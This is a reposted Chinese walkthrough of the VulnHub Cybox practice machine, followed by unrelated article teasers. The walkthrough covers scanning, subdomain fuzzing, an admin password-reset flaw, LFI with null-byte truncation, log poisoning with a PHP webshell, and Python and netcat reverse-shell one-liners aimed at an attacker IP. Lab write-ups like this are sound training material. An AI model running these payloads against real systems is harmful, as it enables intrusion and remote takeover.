【靶机】vulnhub靶机cybox1

news2025/1/14 0:48:45

Vulnhub靶机Cybox下载地址 Cybox: 1.1 ~ VulnHub

信息搜集

首先进行靶机ip的发现。

sudo arp-scan -l

接着使用nmap扫描开放的端口,这里使用扫描全部端口和详细信息太慢了,分开检测

命令:nmap -p 21,25,80,110,143,443 -sV -A 192.168.174.147

扫描到的信息如下:

PORT    STATE SERVICE  VERSION

21/tcp  open  ftp      vsftpd 3.0.3

25/tcp  open  smtp     Postfix smtpd

|_smtp-commands: cybox.Home, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN

|_ssl-date: TLS randomness does not represent time

| ssl-cert: Subject: commonName=cybox

| Not valid before: 2020-11-10T23:31:36

|_Not valid after:  2030-11-08T23:31:36

80/tcp  open  http     Apache httpd 2.2.17 ((Unix) mod_ssl/2.2.17 OpenSSL/0.9.8o DAV/2 PHP/5.2.15)

|_http-title: CYBOX

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8o DAV/2 PHP/5.2.15

110/tcp open  pop3     Courier pop3d

|_pop3-capabilities: USER PIPELINING IMPLEMENTATION(Courier Mail Server) TOP LOGIN-DELAY(10) UIDL

143/tcp open  imap     Courier Imapd (released 2011)

|_imap-capabilities: completed THREAD=REFERENCES THREAD=ORDEREDSUBJECT CAPABILITY IMAP4rev1 ACL CHILDREN NAMESPACE ACL2=UNIONA0001 QUOTA SORT UIDPLUS OK IDLE

443/tcp open  ssl/http Apache httpd 2.2.17 ((Unix) mod_ssl/2.2.17 OpenSSL/0.9.8o DAV/2 PHP/5.2.15)

| sslv2:

|   SSLv2 supported

|   ciphers:

|     SSL2_RC4_128_EXPORT40_WITH_MD5

|     SSL2_RC2_128_CBC_WITH_MD5

|     SSL2_RC4_128_WITH_MD5

|     SSL2_DES_64_CBC_WITH_MD5

|     SSL2_DES_192_EDE3_CBC_WITH_MD5

|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5

|_http-title: CYBOX

| ssl-cert: Subject: commonName=cybox.company/organizationName=Cybox Company/stateOrProvinceName=New York/countryName=US

| Not valid before: 2020-11-14T15:06:32

|_Not valid after:  2021-11-14T15:06:32

|_ssl-date: 2023-02-20T18:22:42+00:00; +6h15m22s from scanner time.

|_http-server-header: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8o DAV/2 PHP/5.2.15

Service Info: Host:  cybox.Home; OS: Unix



Host script results:

|_clock-skew: 6h15m21s



Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 21.21 seconds





目录扫描

gobuster dir -u http://192.168.174.147/ \

-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \

-x php,txt,html,js,php.bak

扫描结果如下

除了静态页面 就是assets目录下的一些js,css文件

尝试ftp,不支持匿名访问

在页面的底部发现类似域名的地方,修改hosts文件

sudo vim /etc/hosts

子域名爆破 

使用wfuzz进行子域名爆破,扫描到一下几个子域名

wfuzz -H 'HOST: FUZZ.cybox.company' -u 'http://192.168.174.147' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 489 -c

再把扫描到的子域名加到这个ip当中,再次修改hosts文件

成功显示

在dev的域名中发现phpinfo文件

在register中可以注册

我们的账号和密码都是ycx

在webmail中使用ycx,ycx,成功登录

在register页面使用这个账号密码是无法登录的

进行注册

注册且登录后发现没有什么东西

尝试忘记密码的页面

进行忘记密码,发现页面没反应,但是发送了一封邮件到我们的邮箱当中

进行查看邮件信息

点击链接需要我们直接修改密码即可

使用新密码登录成功

越权漏洞

这里尝试改一下管理员的密码,修改数据包里的用户ycx为admin

发现修改admin的密码成功

可以看到admin的面板(panel)

查看一下源代码

文件包含漏洞

发现有引用

结合抓包的源码进行利用

这里用到了%00进行截断

形成漏洞的原理:

php基于c语言,是以0字符进行结尾的,所以可以用%00进行截断,之后的字符就不会再读取

Linux下%00截断的条件:

magic_quotes_gpc=off php<5.3.4

这个可以在dev泄露的phpinfo中看到确实是关闭的

拿一个简单的代码查看

<?php

    $a = $_GET['a'];

    include($a.'.html');

 ?>

默认结尾是html,在这台靶机中这个general引用应该是以css为后缀的

可以看到把/etc/passwd的内容读取了出来

反弹shell

下面尝试getshell

尝试使用apache的默认日志路径

应该是/opt/bitnami/apache2/logs/access_log

这样可以看到apache的访问目录

可以看到这个日志记录了时间和user_agent头信息

接着我们抓包ftp页面,修改user_agent头信息为l love you

再次读取access_log日志,可以发现,已经记录了我们的信息

这里就可以尝试写入一句话木马

<?php system($_GET[‘ycx’]);?>

进行构造payload进行读取

http://monitor.cybox.company/admin/styles.php?style=../../../../../../opt/bitnami/apache2/logs/access_log%00&ycx=echo%201111111111

可以看到页面输出了1111111111  

这里是执行的shell命令,比如我们再执行ifconfig

接下来进行反弹shell

使用python命令来进行反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.174.128",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

也可以使用bash,需要进行url编码:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.174.128 4444 >/tmp/f

nc打开监听,nc -nvlp 4444,成功接收到shell

切换到交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

提权

查找具有suid权限的文件

find / -perm -u=s -type f 2>/dev/null

看到/opt特殊目录,进行查看

发现是注册用户,我们起名叫root发现已经存在

再次尝试特殊的名字sudo,创建成功

账号和密码都是sudo

进行sudo用户登录,顺便切换成root

只需su sudo和sudo su (root) 即可

切换到root目录下进行查看root文件

总结:

        从头再顺一下这个靶机的思路,这台靶机是我在b站看到大福安全的视频学到的,在看完一遍过后虽然已经算是“作弊”,但是做的时候还是有很多的磕绊,比如wfuzz命令用来子域名发现的命令书写,apache2日志目录的位置需要观察phpinfo文件来进行发现而不是默认的安装位置,在反弹shell可以利用python也可以利用大福师傅的笔记中的bash命令,最后的提权巧用sudo用户进行提权。不管做了多少靶机(虽然我也没做多少呢),感觉每个靶机都能学到新的东西,所以不能手懒,加油咯。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/379354.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

CentOS救援模式(Rescue Mode)及紧急模式(Emergency Mode)

当CentOS操作系统崩溃&#xff0c;无法正常启动时&#xff0c;可以通过救援模式或者紧急模式进行系统登录。启动CentOS, 当出现下面界面时&#xff0c;按e进入编辑界面。在编辑界面里&#xff0c;加入参数&#xff1a;systemd.unitrescue.target &#xff0c;然后Ctrl-X启动进入…

Linux服务器上传文件到阿里云oss对象存储的两种方法ossutil、curl

ossutil支持在Windows、Linux、macOS等系统中运行&#xff0c;您可以根据实际环境下载和安装合适的版本。安装过程中&#xff0c;需要使用解压工具&#xff08;unzip、7z&#xff09;解压软件包&#xff0c;请提前安装其中的一个解压工具。yum -y install unzipLinux系统一键安…

正点原子第一期

ZYNQ是一个fpga用来硬件编程&#xff0c;外加一个软件编程 FPGA是可通过编程来修改其逻辑功能的数字集成电路 第三篇语法篇 第七章 verilog HDL语法 Verilog的简介 可编程逻辑电路&#xff1a;允许用户自行修改内部连接的集成电路&#xff0c;其内部的电路结构可以通过编程数…

ADAS-CIS相机关键参数综述

引言 “ CIS传感器关键参数是工程师选型参考的依据&#xff0c;抛开镜头&#xff0c;本文介绍CIS可见光传感器关键参数之CRA、QE、CFA、Shutter、SNR等。” 关键参数 CRA CFA(Chief Ray Angle)主光角&#xff0c;在上一篇可见光相机的介绍中我们介绍了Sensor的叠层结构&am…

leecode+剑指offer

1.算法入门14天 1.704二分查找&#xff1a; 题目描述&#xff1a;给定一个 n 个元素有序的&#xff08;升序&#xff09;整型数组 nums 和一个目标值 target &#xff0c;写一个函数搜索 nums 中的 target&#xff0c;如果目标值存在返回下标&#xff0c;否则返回 -1。 思路…

Matlab进阶绘图第3期—方块热图

方块热图是一种特殊的热图&#xff08;Heatmap&#xff09;。 与传统热图相比&#xff0c;方块热图通过不同颜色、不同大小的正方形以表示数据/特征的大小&#xff0c;能够更加直观地对数据分布情况进行分析&#xff0c;也因此可以在一些顶级期刊中看到它的身影&#xff0c;比…

数据库设计三大范式

数据库设计遵循三大范式的理由&#xff1a;在面对复杂是数据库设计的时候&#xff0c;设计数据库要遵循一定的规则&#xff0c;有了一定的规范&#xff0c;这样就可以是自己看起来舒服。 1&#xff0e;第一范式(确保每列保持原子性) 第一范式主要是保证数据表中的每一个字段的…

Java缓存面试题——Redis解决方案

文章目录1、什么是缓存击穿&#xff1f;该如何解决2、什么是缓存穿透&#xff1f;该如何解决3、什么是缓存雪崩&#xff1f;该如何解决4、什么是BigKey&#xff1f;该如何解决bigkey的危害发现bigkey解决bigkey5、redis过期策略都有哪些&#xff1f;6、讲一讲Redis缓存的数据一…

FL Studio 21 中文正式版发布支持多种超个性化主题

万众期待的 FL Studio 21 版本正式发布上线&#xff0c;目前在紧锣密鼓的安排上线中&#xff0c;届时所有购买正版 FL Studio 的用户&#xff0c;都可以免费升级到21版&#xff01; 按照惯例&#xff0c;本次新版也会增加全新插件&#xff0c;来帮助大家更好地创作。今天先给大…

利用 NVIDIATAO 和 WeightBias 加速AI开发

利用 NVIDIATAO 和 Weight&Bias 加速AI开发 利用图像分类、对象检测、自动语音识别 (ASR) 和其他形式的 AI 可以推动公司和商业部门内部的大规模转型。 然而&#xff0c;从头开始构建人工智能和深度学习模型是一项艰巨的任务。 构建这些模型的一个共同先决条件是拥有大量高…

Java枚举详解

一.枚举 1.为什么有枚举&#xff1f; 如果我们的程序需要表示固定的几个值&#xff1a; 比如季节&#xff1a;spring (春)&#xff0c;summer(夏)&#xff0c;autumn(秋)&#xff0c;winter(冬) 用常量表示&#xff1a; public static final int SEASON_SPRING 1;public st…

机械键盘不只有轴体的区别!键帽高度也有些学问

键盘键帽的学问有很多&#xff0c;上篇文章中&#xff0c;笔者和大家聊了键帽的材质和耐油污的问题。 除此之外&#xff0c;键帽的高度和字符的印刷方式也有不同&#xff0c;对于多数机械键盘来说&#xff0c;会发现每一列键帽的倾斜角度都略有不同&#xff0c;使用起来可以减少…

vue在history模式下打包部署问题解决

引言 项目使用的模板是element-template&#xff0c;由于业务需要&#xff0c;我将路由的hash模式更改为了history模式&#xff0c;然后在打包部署项目时就出现了问题 个人发现是资源的访问路径有问题&#xff0c;在部署之后发现每次访问的js资源路径前都会自动携带上我路由的…

如何使用SpringBoot ⽇志?

Spring Boot自定义日志的打印:在一个类中先获取到打印日志对象&#xff08;日志框架提供的日志对象&#xff0c;而日志框架默认已经集成到Spring Boot里了&#xff0c;springboot默认使用 slf4jlogback);注意&#xff1a;得到日志对象Logger ->来自于slf4j2、使用目志对象提…

Operator-sdk 在 KaiwuDB 容器云中的使用

一、使用背景KaiwuDB Operator 是一个自动运维部署工具&#xff0c;可以在 Kubernetes 环境上部署 KaiwuDB集群&#xff0c;借助 Operator 可实现无缝运行在公有云厂商提供的 Kubernetes 平台上&#xff0c;让 KaiwuDB 成为真正的 Cloud-Native 数据库。使用传统的自动化工具会…

深度学习之 imgaug (图像增强)学习笔记

深度学习之 imgaug &#xff08;图像增强&#xff09;前言1\. 安装和卸载2\. 示例2.1 基本使用2.2 包含常用的变换示例3 Augmenters常用函数3.1 iaa.Sequential()3.2 iaa.someOf()3.3 iaa.OneOf()3.4 iaa.Sometimes()3.5 iaa.WithColorspace()3.6 iaa.WithChannels()3.7 iaa.No…

KingbaseES V8R3 表加密

前言 透明加密是指将数据库page加密后写入磁盘&#xff0c;当需要读取对应page时进行加密读取。此过程对于用户是透明&#xff0c; 用户无需干预。 该文档进行数据库V8R3版本测试透明加密功能&#xff0c;需要说明&#xff0c;该版本发布时间早于V8R6&#xff0c;所以只能进行表…

我带过的一名C++实习生——Z同学

刚开始带Z同学&#xff0c;吃饭聊天时&#xff0c;我顺便了解了下他的擅长&#xff1a;linux平台下C、C网络编程。 接下来的实习&#xff0c;主要分为两个阶段&#xff1a;小组公共培训和项目实训。 小组公共培训为期2周&#xff0c;主要学习和了解公司文化制度&#xff0c;讲师…

【项目设计】高并发内存池(三)[CentralCache的实现]

&#x1f387;C学习历程&#xff1a;入门 博客主页&#xff1a;一起去看日落吗持续分享博主的C学习历程博主的能力有限&#xff0c;出现错误希望大家不吝赐教分享给大家一句我很喜欢的话&#xff1a; 也许你现在做的事情&#xff0c;暂时看不到成果&#xff0c;但不要忘记&…

脏牛复现(CVE2016-5195)

nmap扫描全网段&#xff0c;发现存货主机&#xff0c;ip为192.168.85.141nmap 192.168.85.0/24nmap 扫描端口&#xff0c;发现80端口&#xff0c;访问该网站nmap -p1-65535 192.168.85.141扫描该网站目录&#xff0c;什么也没扫出来 &#xff0c;dirb扫描目录的字典在usr/share…